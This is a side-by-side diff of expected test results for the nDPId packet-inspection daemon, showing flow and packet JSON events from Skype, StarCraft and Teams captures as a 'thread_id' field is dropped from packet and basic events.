00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
00431{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":897,"source":"skype_no_unknown.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":100,"pkt_type":94,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":100,"pkt_l4_len":0,"thread_ts_msec":1431970666274,"pkt":"AQAMzMzMJKQ8\/kzXAF6qqgMAAAwgAAF4S2kAAQAOQWlyR2F0ZXdheQACABEAAAABAQHMAATAqAHbAAQACAAAAAIABQAQQWlyR1cudjEuMC4zAAYAB0FHVwADAAdicjAA\/wAFLg=="} 00417{"packet_event_id":1,"packet_event_name":"packet","packet_id":897,"source":"skype_no_unknown.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":100,"pkt_type":94,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":100,"pkt_l4_len":0,"thread_ts_msec":1431970666274,"pkt":"AQAMzMzMJKQ8\/kzXAF6qqgMAAAwgAAF4S2kAAQAOQWlyR2F0ZXdheQACABEAAAABAQHMAATAqAHbAAQACAAAAAIABQAQQWlyR1cudjEuMC4zAAYAB0FHVwADAAdicjAA\/wAFLg=="}
00206{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":897,"source":"skype_no_unknown.pcap","alias":"nDPId-test","layer_type":94,"global_ts_msec":1431970666370} 00192{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":897,"source":"skype_no_unknown.pcap","alias":"nDPId-test","layer_type":94,"global_ts_msec":1431970666370}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666902,"flow_last_seen":1431970666902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666902,"flow_last_seen":1431970666902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1431970666902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666902,"pkt":"0NQSxnP1PBXCt3IOCABFAABAb9VAAEAG6VLAqAEinTeCjsg3nEXoG0e9AAAAALAC\/\/9+tAAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1431970666902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666902,"pkt":"0NQSxnP1PBXCt3IOCABFAABAb9VAAEAG6VLAqAEinTeCjsg3nEXoG0e9AAAAALAC\/\/9+tAAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666902,"flow_last_seen":1431970666902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666902,"flow_last_seen":1431970666902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -1303,6 +1303,6 @@
~~ total memory freed........: 5208323 bytes ~~ total memory freed........: 5208323 bytes
~~ total allocations/frees...: 104146/104146 ~~ total allocations/frees...: 104146/104146
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 211 chars ~~ json string min len.......: 197 chars
~~ json string max len.......: 1776 chars ~~ json string max len.......: 1776 chars
~~ json string avg len.......: 993 chars ~~ json string avg len.......: 986 chars

8
test/results/starcraft_battle.pcap.out
View File

@@ -47,8 +47,8 @@
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389961548,"flow_last_seen":1437389961548,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1437389961548,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389961548,"flow_last_seen":1437389961548,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1437389961548,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1437389961548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1437389961548,"pkt":"hCYVPnXEIImEa8W6CABFAAApPndAAIAGAKbAqAFkQOm4vArHFGzE+CH9edXaGlAQAPyZDAAAAA=="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1437389961548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1437389961548,"pkt":"hCYVPnXEIImEa8W6CABFAAApPndAAIAGAKbAqAFkQOm4vArHFGzE+CH9edXaGlAQAPyZDAAAAA=="}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1437389961598,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389961598,"pkt":"IImEa8W6hCYVPnXECABFAAA0aJ8AACgGbnNA6bi8wKgBZBRsCsd51doaxPgh\/oAQAXGUkwAAAQEFCsT4If3E+CH+"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1437389961598,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389961598,"pkt":"IImEa8W6hCYVPnXECABFAAA0aJ8AACgGbnNA6bi8wKgBZBRsCsd51doaxPgh\/oAQAXGUkwAAAQEFCsT4If3E+CH+"}
00374{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":28,"source":"starcraft_battle.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":58,"pkt_type":35020,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":58,"pkt_l4_len":0,"thread_ts_msec":1437389961598,"pkt":"AYDCAAAOIImEa8W6iMwCBwQgiYRrxboEBwMgiYRrxboGAg4R\/gkAEg8BAwABAAD+BwASuwEAAQEAAA=="} 00360{"packet_event_id":1,"packet_event_name":"packet","packet_id":28,"source":"starcraft_battle.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":58,"pkt_type":35020,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":58,"pkt_l4_len":0,"thread_ts_msec":1437389961598,"pkt":"AYDCAAAOIImEa8W6iMwCBwQgiYRrxboEBwMgiYRrxboGAg4R\/gkAEg8BAwABAAD+BwASuwEAAQEAAA=="}
00208{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":28,"source":"starcraft_battle.pcap","alias":"nDPId-test","layer_type":35020,"global_ts_msec":1437389962628} 00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":28,"source":"starcraft_battle.pcap","alias":"nDPId-test","layer_type":35020,"global_ts_msec":1437389962628}
00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389963466,"flow_last_seen":1437389963466,"flow_idle_time":180000,"flow_min_l4_payload_len":381,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1437389963466,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389963466,"flow_last_seen":1437389963466,"flow_idle_time":180000,"flow_min_l4_payload_len":381,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1437389963466,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00958{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1437389963466,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":423,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":423,"pkt_l4_len":389,"thread_ts_msec":1437389963466,"pkt":"AQBef\/\/6hCYVPnXECABFAAGZAABAAAERxbPAqAH+7\/\/\/+pbNB2wBhW9zTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTYwDQpsT0NBVElPTjogaHR0cDovLzE5Mi4xNjguMS4yNTQ6NTcwNTIvcm9vdERlc2MwLnhtbA0KU0VSVkVSOiBFUElDRU5UUk8gVVBuUC8xLjAgTWluaVVQblBkLzEuNg0KTlQ6IHV1aWQ6MTEyNjY3MzYtZmE1OS0xMWU0LTljOWYtODQyNjE1M2U3NWM0DQpVU046IHV1aWQ6MTEyNjY3MzYtZmE1OS0xMWU0LTljOWYtODQyNjE1M2U3NWM0DQpOVFM6IHNzZHA6YWxpdmUNCk9QVDogImh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7DQowMS1OTFM6IDENCkJPT1RJRC5VUE5QLk9SRzogMQ0KQ09ORklHSUQuVVBOUC5PUkc6IDEzMzcNCg0K"} 00958{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1437389963466,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":423,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":423,"pkt_l4_len":389,"thread_ts_msec":1437389963466,"pkt":"AQBef\/\/6hCYVPnXECABFAAGZAABAAAERxbPAqAH+7\/\/\/+pbNB2wBhW9zTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTYwDQpsT0NBVElPTjogaHR0cDovLzE5Mi4xNjguMS4yNTQ6NTcwNTIvcm9vdERlc2MwLnhtbA0KU0VSVkVSOiBFUElDRU5UUk8gVVBuUC8xLjAgTWluaVVQblBkLzEuNg0KTlQ6IHV1aWQ6MTEyNjY3MzYtZmE1OS0xMWU0LTljOWYtODQyNjE1M2U3NWM0DQpVU046IHV1aWQ6MTEyNjY3MzYtZmE1OS0xMWU0LTljOWYtODQyNjE1M2U3NWM0DQpOVFM6IHNzZHA6YWxpdmUNCk9QVDogImh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7DQowMS1OTFM6IDENCkJPT1RJRC5VUE5QLk9SRzogMQ0KQ09ORklHSUQuVVBOUC5PUkc6IDEzMzcNCg0K"}
00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389963466,"flow_last_seen":1437389963466,"flow_idle_time":180000,"flow_min_l4_payload_len":381,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1437389963466,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389963466,"flow_last_seen":1437389963466,"flow_idle_time":180000,"flow_min_l4_payload_len":381,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1437389963466,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
@@ -325,6 +325,6 @@
~~ total memory freed........: 4773923 bytes ~~ total memory freed........: 4773923 bytes
~~ total allocations/frees...: 102163/102163 ~~ total allocations/frees...: 102163/102163
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 213 chars ~~ json string min len.......: 199 chars
~~ json string max len.......: 1047 chars ~~ json string max len.......: 1047 chars
~~ json string avg len.......: 630 chars ~~ json string avg len.......: 623 chars

160
test/results/teams.pcap.out
View File

@@ -3,21 +3,21 @@
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041672419,"flow_last_seen":1587041672419,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1587041672419,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041672419,"flow_last_seen":1587041672419,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1587041672419,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1587041672419,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1587041672419,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzES1AAEARZ+TAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGABgr52AAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} 00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1587041672419,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1587041672419,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzES1AAEARZ+TAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGABgr52AAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"}
00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041672419,"flow_last_seen":1587041672419,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1587041672419,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}} 00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041672419,"flow_last_seen":1587041672419,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1587041672419,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}}
00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041672419,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041672419,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00193{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041672611} 00179{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041672611}
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041673094,"flow_last_seen":1587041673094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041673094,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041673094,"flow_last_seen":1587041673094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041673094,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1587041673094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041673094,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPCDAqAEGlZqnW+SlAbsZTPC7DAoX94ARECZ4MwAAAQEICjCEirAtAPMf"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1587041673094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041673094,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPCDAqAEGlZqnW+SlAbsZTPC7DAoX94ARECZ4MwAAAQEICjCEirAtAPMf"}
00369{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":4,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041673094,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041673094,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":4,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041673412} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":4,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041673412}
